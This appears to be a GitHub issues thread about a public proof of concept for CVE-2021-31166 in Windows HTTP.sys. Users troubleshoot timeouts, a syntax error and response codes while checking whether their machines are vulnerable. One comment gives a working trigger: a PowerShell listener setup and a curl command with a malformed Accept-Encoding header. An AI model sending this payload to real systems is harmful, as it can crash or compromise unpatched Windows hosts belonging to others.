0vercl0k / cve-2021-31166 Goto Github PK

On Linux the command
python3 cve-2021-31166.py --target=192.168.0.112
hangs then fails with connection timed out error. Target is a Windows 10 20H2 64 bit machine that (I believe) wasn't updated in 3 weeks. Does that mean it isn't vulnerable?

I think you can use curl to exploit as well. Likely local privilege escalation, since a normal user can register a listener on a high port.

$listener = New-Object System.Net.HttpListener
$listener.Prefixes.Add('http://localhost:8080/') 
$listener.Start()
curl.exe -H 'Accept-Encoding:  doar-e, ftw, imo, ,' http://localhost:8080/

Also which tool are you using to reverse with, for the images? Very cool

Cheers

I am using Windows 10 Version IIS version 20H2 for x64 Systems. and when I am trying PoC and perdform manually using burpsuit. It is showing 400 response.
Could you help me out?

Version details

PoC

D:\git\Vulnerability\CVE\CVE-2021-31166>C:\python27\python.exe cve-2021-31166.py --target=172.23.240.1
File "cve-2021-31166.py", line 9
r = requests.get(f'http://{args.target}/', headers = {
^
SyntaxError: invalid syntax

D:\git\Vulnerability\CVE\CVE-2021-31166>

Hello! OS Windows-Server-2016-Standard, try:
python3 cve-2021-31166.py --target X.X.X.X
But <Responce [200]>. This is because OS not from trouble list: Windows Server version 2004 (or 20H1) , Windows 10 Version 2004 (or 20H1), Windows Server, version 20H2, Windows 10 Version 20H2?

I just want to verify some assets, but I don't know the status code of 200 results of poc is successful?